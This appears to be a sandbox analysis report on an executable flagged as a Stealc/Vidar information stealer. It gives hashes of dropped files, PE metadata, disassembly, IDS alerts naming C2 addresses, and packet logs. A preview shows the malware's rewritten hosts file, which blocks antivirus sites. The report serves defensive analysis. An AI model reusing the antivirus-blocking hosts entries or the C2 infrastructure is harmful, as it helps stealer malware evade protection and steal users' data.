                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8xcd3TvjsH7idAKZdA14tseh7sFiZUkmgqeh7siy+BX:8xcXenoy
                                                                                                                                                                                                                                                                                                                                                        MD5:00D52FDD3563B4F45E14D663324C7A99
                                                                                                                                                                                                                                                                                                                                                        SHA1:610BF70F85412DA0B5CF0293C80449D8CFCB3185
                                                                                                                                                                                                                                                                                                                                                        SHA-256:575509A13E3E642DF2A55A527FA22DD5170EACFB2122F5CB796DC5C4C10F3351
                                                                                                                                                                                                                                                                                                                                                        SHA-512:373E02CB2EC579BBE2A5F2B7569680BB5AA551EA38CCA4C280DDA3E5571A564C8EC395390DD192B62ECC80C5D084119B6DEAC825808EC8268B346623214102D6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 13:26:03 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.9857193888091658
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8td3TvjbH7idAKZdA1vehDiZUkwqehgy+R:8XXYay
                                                                                                                                                                                                                                                                                                                                                        MD5:B26600AA44C5DD45F4033B76D1551E3C
                                                                                                                                                                                                                                                                                                                                                        SHA1:3518233C12D7E848E656E4716EB85EBC6275AFD8
                                                                                                                                                                                                                                                                                                                                                        SHA-256:3DE9C0FE8537E2912CB41E469FE87A8DC13BDF22F567F72304B9B1D41C4C02F3
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D33EDCD975233DFA148A0EEBDBC6AAA3FA8D51E112B19ED8B0D9CF14D9638660027F55A0BEBA12BF0B4D8542A8264BE7C64C6EA0EED10FE73DBCCEE25CB5C0E6
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 13:26:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
Size (bytes):2681
Entropy (8bit):3.975664588991513
Encrypted:false
SSDEEP:48:8id3TvjbH7idAKZdA1hehBiZUk1W1qehmy+C:8yXI9Gy
MD5:634ECFE3F76482430E3E7624B5A43AEB
SHA1:0DE0B1487D4D5D3D79EBC9B09FDAD916D612FBE4
SHA-256:3B2E2E62666177D289750DF3A8D1074D1FAB10D46F88BB8CCBD96AC190FEC612
SHA-512:5561C3C2672A840E277D13C87C5D3013291DA79094717D087E9E480EDAC1D8DC7F4407BDAC4FE5E3FA27E9A86C85E62F6A8FAD41AA951E5B036F4FF45B5A57C4
Malicious:false
Preview:L..................F.@.. ...$+.,....^..".6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InY@s....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY@s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY@s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY@s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnYBs...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y.-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 14 13:26:03 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:dropped
Size (bytes):2683
Entropy (8bit):3.984180189881607
Encrypted:false
SSDEEP:48:8Cd3TvjbH7idAKZdA1duT+ehOuTbbiZUk5OjqehOuTboy+yT+:8SXmT/TbxWOvTboy7T
MD5:90BBBEE8D59E82D19324AF38E6CBD254
SHA1:76B24BA26F6093C06D146E0F6EA22DC7883E3E09
SHA-256:6F571CE6D67F26AF8E5E180985B003EADBE94F0B80A8FF30D170A62F2A388CFF
SHA-512:9A68123BE4F01724DCF12407A392949713D7F6849937A44D40821CF1E4D053F0797A49DAE094462A4A6F99A1854E2F245E4FC1F7FAC727D223B06E6004D61EB2
Malicious:false
Preview:L..................F.@.. ...$+.,......V".6..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.InY@s....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VnY@s....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VnY@s....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VnY@s..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VnYBs...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............y.-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
Process:C:\ProgramData\GHDAKKJJJK.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):5842928
Entropy (8bit):7.890789729742247
Encrypted:false
SSDEEP:98304:kYq0KmyfpgVBH9rqADdgnILbQaPhgPqt0nw9pdfvBNTHuzD8vxFJN+L24Kc:tUpg3drqMSILbQAWPqt04phBNTOEvhIh
MD5:18F4B337AD6BEB8E7EE040BCC8C049DF
SHA1:641350458E08F2275A451239DC74A2F7681ADF4F
SHA-256:9B3607E5A2407E4A2875EA68340CF1724853031A39DD7FAA47A97C83B1B1F5E3
SHA-512:68AD53F8F42B9DB45F080D5DC467E4A4A01B3DDC4D7F816A31C10C720D0B92A2F57F028E82614CCF7FF04D2CBEB0F9F0355D89E70380319A549CC926E8596AAA
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 54%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..f.................F..........o0M......`....@.................................E.Y....... ..............................t......P..$.............Y......................................|@......................P-.4............................text...TE..........................`.P`.data...(....`......................@.0..rdata..0....p......................@.0@.eh_fram@...........................@.0@.bss....p.............................0..idata..............................@.0..CRT................................@.0..tls.... ...........................@.0..vmp.$..l,......................... ..`.vmp.$......P-.....................@....vmp.$...X..`-...X................. ..`.rsrc...$....P........X.............@..@................................................................................................................................................
Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
Process:C:\Users\user\AppData\Roaming\service.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):5842928
Entropy (8bit):7.890789729742247
Encrypted:false
SSDEEP:98304:kYq0KmyfpgVBH9rqADdgnILbQaPhgPqt0nw9pdfvBNTHuzD8vxFJN+L24Kc:tUpg3drqMSILbQAWPqt04phBNTOEvhIh
MD5:18F4B337AD6BEB8E7EE040BCC8C049DF
SHA1:641350458E08F2275A451239DC74A2F7681ADF4F
SHA-256:9B3607E5A2407E4A2875EA68340CF1724853031A39DD7FAA47A97C83B1B1F5E3
SHA-512:68AD53F8F42B9DB45F080D5DC467E4A4A01B3DDC4D7F816A31C10C720D0B92A2F57F028E82614CCF7FF04D2CBEB0F9F0355D89E70380319A549CC926E8596AAA
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 54%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..f.................F..........o0M......`....@.................................E.Y....... ..............................t......P..$.............Y......................................|@......................P-.4............................text...TE..........................`.P`.data...(....`......................@.0..rdata..0....p......................@.0@.eh_fram@...........................@.0@.bss....p.............................0..idata..............................@.0..CRT................................@.0..tls.... ...........................@.0..vmp.$..l,......................... ..`.vmp.$......P-.....................@....vmp.$...X..`-...X................. ..`.rsrc...$....P........X.............@..@................................................................................................................................................
Process:C:\ProgramData\AAFIJKKEHJ.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2748
Entropy (8bit):4.269302338623222
Encrypted:false
SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
MD5:7B1D6A1E1228728A16B66C3714AA9A23
SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
Malicious:true
Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..
File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):6.40914782072564
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:S0FTWARE.exe
File size:26'859'520 bytes
MD5:bae4ccaa9aa2b36270938dde45d069be
SHA1:cb696fbf4fe475d7f101c74d30cc66d3145c9518
SHA256:e74b15c06a985bbe82864342a4d69e071fcc304f18bccc14848d8a8e21ce956f
SHA512:eb621a8f1681635bda3a7dce51c117850849bebe34168f9aa92426df623f5284ad5570fd2e1b629d43dc767ded269eb7c04360804939259807022d7b61b6b026
SSDEEP:196608:7ZNOWAzUkdflDyh8N090he/9YgumJkc4iXMvqKXohDMvGCEY:C9VxY8N09keFYvDVv76Ty
TLSH:BA474A50FDEB42F1DA0358705597A27F63306E058B28CACBD600BF6AF87B6E10A77159
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................................... .........o...@.................................7,....@................................
Icon Hash:2d2e3797b32b2b99
Entrypoint:0x46da20
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:1
File Version Major:6
File Version Minor:1
Subsystem Version Major:6
Subsystem Version Minor:1
Import Hash:ff9f3a86709796c17211f9df12aae74d
Instruction
jmp 00007F915D043660h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov esi, eax
mov edx, dword ptr fs:[00000014h]
cmp edx, 00000000h
jne 00007F915D0459A9h
mov eax, 00000000h
jmp 00007F915D045A06h
mov edx, dword ptr [edx+00000000h]
cmp edx, 00000000h
jne 00007F915D0459A7h
call 00007F915D045A99h
mov dword ptr [esp+20h], edx
mov dword ptr [esp+24h], esp
mov ebx, dword ptr [edx+18h]
mov ebx, dword ptr [ebx]
cmp edx, ebx
je 00007F915D0459BAh
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], ebx
mov edi, dword ptr [ebx+1Ch]
sub edi, 28h
mov dword ptr [edi+24h], esp
mov esp, edi
mov ebx, dword ptr [ecx]
mov ecx, dword ptr [ecx+04h]
mov dword ptr [esp], ebx
mov dword ptr [esp+04h], ecx
mov dword ptr [esp+08h], edx
call esi
mov eax, dword ptr [esp+0Ch]
mov esp, dword ptr [esp+24h]
mov edx, dword ptr [esp+20h]
mov ebp, dword ptr fs:[00000014h]
mov dword ptr [ebp+00000000h], edx
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
                                                                                                                                                                                                                                                                                                                                                        mov ebp, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                                                                                                        mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                                                                                                                                                        retn 0004h
                                                                                                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                                                                                                        mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                                                                                        mov edx, dword ptr [ecx]
                                                                                                                                                                                                                                                                                                                                                        mov eax, esp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1940000 | 0x410 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19e5000 | 0x2160 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1941000 | 0xa26a6 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1703480 | 0xa8 | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xbf83f5 | 0xbf8400 | f5b5b140fbae3d4d2a2f5432d9788dda | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xbfa000 | 0xb028d4 | 0xb02a00 | 19772c7d0f0d0e74b9d084d113f2ec1f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x16fd000 | 0x2422ec | 0x1fd400 | 2bd0495cd8cbe635fa30367375992cc6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x1940000 | 0x410 | 0x600 | 0941897b2203b75df6027d208b32f264 | False | 0.3359375 | data | 3.7846389634055217 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x1941000 | 0xa26a6 | 0xa2800 | 888fbc0912920b5ee6b643cdc8e85a5b | False | 0.5326246995192307 | data | 6.681772258008935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab | 0x19e4000 | 0x4 | 0x200 | 07b5472d347d42780469fb2654b7fc54 | False | 0.02734375 | data | 0.020393135236084953 | IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x19e5000 | 0x2160 | 0x2200 | 5054d5a060ed1cc59bf06ce1d28d2363 | False | 0.31594669117647056 | data | 4.697583439460509 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x19e51d4 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675
RT_ICON | 0x19e52fc | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179
RT_ICON | 0x19e5864 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548
RT_ICON | 0x19e5b4c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516
RT_GROUP_ICON | 0x19e63f4 | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x19e6434 | 0x584 | data | English | United States | 0.2804532577903683
RT_MANIFEST | 0x19e69b8 | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
DLL | Import
kernel32.dll | WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetThreadPriority, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateWaitableTimerA, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-14T15:25:48.791498+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 116.203.0.159 | 443 | 192.168.2.5 | 49864 | TCP
2024-11-14T15:25:50.283580+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.5 | 49875 | 116.203.0.159 | 443 | TCP
2024-11-14T15:25:50.284090+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 116.203.0.159 | 443 | 192.168.2.5 | 49875 | TCP
2024-11-14T15:26:50.216588+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 50137 | 185.166.143.49 | 443 | TCP
2024-11-14T15:27:02.768520+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 50140 | 185.166.143.49 | 443 | TCP
2024-11-14T15:29:47.538600+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 50155 | 51.105.71.136 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.519591093 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.519603968 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.519969940 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.568690062 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.838291883 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.838325977 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.838386059 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.838655949 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:16.838668108 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.532387972 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.575367928 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.601121902 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.601227999 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.604551077 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.604578018 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.604976892 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.613565922 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.659331083 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791136980 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791249037 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791269064 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791367054 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791383982 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791419029 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791433096 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791457891 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791459084 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791459084 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791477919 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791492939 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791551113 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791564941 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791570902 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.791953087 CET4434970420.109.210.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.792011976 CET49704443192.168.2.520.109.210.53
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.855839968 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.855881929 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.855902910 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.855951071 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.855966091 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.856035948 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.856065035 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972218037 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972259045 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972287893 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972301960 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972333908 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:17.972351074 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088836908 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088896036 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088926077 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088944912 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088958979 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.088983059 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.202660084 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.202688932 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.202739954 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.202755928 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.202810049 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320139885 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:18.320183039 CET4434970713.107.246.45192.168.2.5
